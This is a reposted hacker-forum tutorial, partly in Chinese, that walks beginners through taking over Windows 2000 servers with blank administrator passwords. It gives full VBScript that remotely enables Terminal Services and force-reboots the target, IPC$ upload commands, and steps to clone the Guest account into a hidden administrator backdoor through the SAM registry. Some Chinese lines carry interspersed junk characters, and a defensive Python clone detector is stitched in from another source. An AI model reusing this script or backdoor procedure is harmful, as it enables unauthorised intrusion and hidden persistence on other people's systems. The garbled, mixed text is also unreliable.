A simple 3389 intrusion walkthrough
Original author: caozhe (草哲)
Source: 中国欲网技术论坛 -- 草哲
I have seen many, many articles online teaching you how to break in, and I think a newbie simply cannot understand them!

So I had an idea! I wanted to write something simpler, suited to newbies, and tell everyone what I have learned!
To do the intrusion, I suggest you work in a Win2000 environment!
First, to break in, you need tools! Let me recommend a few programs, the ones I have always used:
for scanning, X-Scan V2.3, WINNTAutoAttack and 流光 (Fluxay)!
I rarely use X-Scan lately; mostly I use WINNTAutoAttack, and of course I often use 小榕's 流光 as well!
Opening the terminal remotely only needs one script; the code is in the second post (it is appended below)! Save it as *.vbe (I saved mine as rots.vbe).
Cloning an account only needs psu!
$ y8 s: t$ P# p( N1 o t( Q8 f% x
& G( X4 }( Y [) z: y5 D2 k: ^( C: AOK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空* H8 p7 i4 }' B: r6 \
运行CMD(2000下的DOS),我们给它开终端!& Z! ~% @8 H) X6 Y
命令如下!; B- S7 J1 Y# W. G" F$ |& D
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
, \" T7 I; L2 n. Q4 f上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
/ v0 y5 A8 x3 g& G; }6 q# D8 D+ l( | {! Q! l
因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!
" N7 q, Z+ J/ r0 ~ v- y; j- g( Z* h
6 c0 Q1 j, \3 B5 [/ T/ q# i一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t# I) ~# n, o$ P' D
安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!( ~8 B! Y2 R$ R8 a/ b2 ~& R; V" r
T6 L4 ^; Z/ z% e( o
回到DOS下!我们建立IPC$连接!
4 r- H( x6 ]% ^8 ~; @: @net use \\120.0.0.1\ipc$ "" /user:"administrator"
8 q# } h2 G; L5 [+ y这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!% p# x% D z7 S& ^; @3 n( p( x
copy psu.exe \\120.0.0.1\admin$\system32
) o/ A6 G7 q4 }上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
8 f+ {: T, S1 u! g5 L g
Suppose the guest user is disabled; we are going to use guest as the backdoor account!
Run CMD on that server and enter at the command line:
psu -p regedit -i PID

Let me explain: the PID at the end is the process ID of the system process winlogon. Right-click the taskbar and open Task Manager;
on the Processes tab, find the winlogon process; the number next to it is winlogon's PID. Say it is 5458.
Then the command is:
psu -p regedit -i 5458
This opens the registry editor directly (it now runs with winlogon's SYSTEM privileges, which is why the local SAM information can be read).
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
Under it is the local user information! What we want to do is clone the disabled guest into an account with administrator rights!
Under HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
look at administrator's type: it is 1F4; then look at guest's: it is 1F5.
Good, now that you know the types, open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
Double-click F on the right, copy all of the jumbled characters inside, then open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
double-click F on the right, and paste what you just copied into it!
When that is done, export these two keys:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
After exporting, delete the two keys, then import them back in! Close the registry editor.
Open CMD and enter at the command line:
net user guest password
This command sets a password for guest; the password at the end is the password.
Then enter
net user guest /active:y
This command activates the guest account; then we disable it again:
net user guest /active:n
The three commands above must be run from DOS!

OK, done. Open Computer Management and look at Users: see, the guest account is still disabled! Haha, but it already has administrator rights!
And it does not show up in the Administrators group, yet it can log on to the terminal just like the administrator account!

Log off and log on as guest!
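As an added example (not from the original post), here is the check a defender would run against the clone described above: the F value under each Users\&lt;RID&gt; key carries the RID the SAM actually uses for that account, so a Guest key (000001F5) whose F says RID 500 is the signature of this trick. It assumes the F layout used by RegRipper's samparse (RID as a little-endian uint32 at offset 0x30, ACB flags as a uint16 at 0x38); make_f, parse_f and find_clones are names chosen here, and the hive contents are constructed inline rather than read from a SAM file.

```python
import struct

# F-value layout assumed here (the RegRipper samparse convention):
RID_OFFSET = 0x30      # uint32 LE: the RID the SAM actually uses for the account
ACB_OFFSET = 0x38      # uint16 LE: ACB account-control flags
ACB_DISABLED = 0x0001  # "account disabled" bit

def make_f(rid, acb_flags):
    """Constructed F blob for test data only; real blobs come from the SAM hive."""
    f = bytearray(0x50)
    struct.pack_into("<I", f, RID_OFFSET, rid)
    struct.pack_into("<H", f, ACB_OFFSET, acb_flags)
    return bytes(f)

def parse_f(f):
    """Return the RID and disabled flag stored inside an F value."""
    if len(f) < 0x40:
        raise ValueError("F value too short: %d bytes" % len(f))
    (rid,) = struct.unpack_from("<I", f, RID_OFFSET)
    (acb,) = struct.unpack_from("<H", f, ACB_OFFSET)
    return {"rid": rid, "disabled": bool(acb & ACB_DISABLED)}

def find_clones(users, names):
    """users: {hex key under Users: F bytes}; names: {account name: RID from Users\\Names}.
    Flags every account whose key RID differs from the RID embedded in its F value."""
    rid_to_name = {rid: name for name, rid in names.items()}
    findings = []
    for key, f in users.items():
        key_rid = int(key, 16)
        info = parse_f(f)
        if info["rid"] != key_rid:
            findings.append({"name": rid_to_name.get(key_rid, "?"), "key_rid": key_rid,
                             "embedded_rid": info["rid"], "disabled": info["disabled"]})
    return findings

# Constructed sample: Guest's F overwritten with Administrator's and Guest disabled
# again, which is the end state the walkthrough above leaves behind.
SAMPLE_NAMES = {"Administrator": 0x1F4, "Guest": 0x1F5, "alice": 0x3E9}
SAMPLE_USERS = {
    "000001F4": make_f(0x1F4, 0x0210),  # Administrator: untouched
    "000001F5": make_f(0x1F4, 0x0211),  # Guest: RID 500 inside F, disabled bit set
    "000003E9": make_f(0x3E9, 0x0210),  # ordinary user: untouched
}

if __name__ == "__main__":
    for hit in find_clones(SAMPLE_USERS, SAMPLE_NAMES):
        print("CLONE: %(name)s (key RID %(key_rid)d) carries RID %(embedded_rid)d, "
              "disabled=%(disabled)s" % hit)
```

Run against a real hive, the same mismatch test also catches the variant where the clone is re-enabled, because it keys on the RID, not on the disabled bit.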

Typing all this has worn me out! It really is not easy! Heh, I hope everyone can understand the above!
If there is anything you still don't understand, you can ask me, and whatever I know I will tell you!

I am only a newbie myself, and having learned a little I hardly know what to do with myself, heh! If anything here is wrong, I ask the experts to point it out!
----------------------------------------------------------------------
Below is the script that opens the terminal; save it as *.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin

' If started under wscript.exe (double-click), relaunch under cscript in a console window
if (lcase(right(wscript.fullname,11))="wscript.exe") then
    set objShell=wscript.createObject("wscript.shell")
    objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
    wscript.quit
end if

if wscript.arguments.count<3 then
    usage()
    wscript.echo "Not enough parameters."
    wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
    port=wscript.arguments(3)
else
    port=3389
end if
' Arguments arrive as strings; convert before the range check, because VBScript
' always ranks a numeric value below a string, and the DWORD write needs a number
if not isnumeric(port) then
    wscript.echo "The number of port is error."
    wscript.quit
end if
port=clng(port)
if port<1 or port>65000 then
    wscript.echo "The number of port is error."
    wscript.quit
end if
if wscript.arguments.count>4 then
    reboot=wscript.arguments(4)
else
    reboot=""
end if

usage()
outstreem.write "Conneting "&ipaddress&" ...."
' Connect to the target's WMI service with the supplied credentials
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
' Terminal Services only exists on the Server editions; warn and offer to quit otherwise
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
    if instr(objinstoscaption.caption,"Server")>0 then
        wscript.echo "OK!"
    else
        wscript.echo "OS type is "&objinstoscaption.caption
        outstreem.write "Do you want to cancel setup?[y/n]"
        strcancel=instreem.readline
        if lcase(strcancel)<>"n" then wscript.quit
    end if
next

outstreem.write "Writing into registry ...."
' Remote registry edits through the StdRegProv WMI provider
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
    .createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
    .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
    .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
    .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
    .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

' Win32Shutdown flags: 2 = reboot, 6 = forced reboot
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
    outstreem.write "Now, reboot target...."
    strwqlquery="select * from win32_operatingsystem where primary='true'"
    set colinstances=objswbemservices.execquery(strwqlquery)
    for each objinstance in colinstances
        objinstance.win32shutdown(flag)
    next
    showerror(err.number)
else
    wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

' Print the pending error (if any) and quit, otherwise report OK
function showerror(errornumber)
    if errornumber Then
        wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
        if err.description <> "" then
            wscript.echo "Error description: "&err.description&"."
        end if
        wscript.quit
    else
        wscript.echo "OK!"
    end if
end function

function usage()
    wscript.echo string(79,"*")
    wscript.echo "ROTS v1.05"
    wscript.echo "Remote Open Terminal services Script, by 草哲"
    wscript.echo "Welcome to visite www.5458.net"
    wscript.echo "Usage:"
    wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
    wscript.echo "port: default number is 3389."
    wscript.echo "/r: auto reboot target."
    wscript.echo "/fr: auto force reboot target."
    wscript.echo string(79,"*")&vbcrlf
end function
Reposted from 安全焦点 (XFocus)